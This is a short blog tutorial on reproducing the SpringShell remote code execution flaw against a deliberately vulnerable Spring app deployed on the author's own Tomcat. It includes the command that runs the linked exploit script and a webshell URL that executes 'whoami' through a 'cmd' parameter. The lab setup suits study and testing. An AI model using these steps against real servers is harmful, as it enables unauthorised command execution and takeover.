code

Thursday, March 31, 2022

Complete SpringShell RCE Exploit PoC and Vulnerable App


I present here a complete tutorial and POC for rcent SpringShell vulnerability for Spring Core module.

 


Running on Ubuntu (tested on 20.04) 

Github: https://github.com/agentzex/spring-shell-exploit-poc

Prerequisites:

App Preparation:

  • Download the spring web app from the 'app' directory in this repo
  • cd to it and run 'mvn package'
  • after it's done, cd to 'target' directory which was created and copy the 'zex-poc.war' file

Deployment: tomcat-root-dir - should be '/opt/tomcat/' if you followed the above guide.

  • If you're running tomcat < 10 : copy the war file to 'tomcat-root-dir/webapps/'
  • If you're running tomcat 10:
    1. create a directory named 'webapps-javaee' in tomcat-root-dir
    2. copy the war file to this directory
    3. Tomcat will migrate the legacy J2EE war file automatically from that folder and will deploy it in tomcat-root-dir/webapps/'
  • Run tomcat with tomcat-root-dir/bin/catalina.sh run' and check for errors.
  • If everything worked, we can now run the poc.py file and access a browser to launch commands in the created webshell.
    1. Run python (or python3) pwn.py --url http://server.ip:8080/zex-poc/greeting
    2. Access via browser or other http client with GET: http://server.ip:8080/zex-poc/tomcatwar.jsp?pwd=j&cmd=whoami
    3. PWND

What happens when you combine a Flipper Zero with Gameboy Color?

      Hello my fellow vintage geeks . If you're a 90s kid and had style you probably owned an A...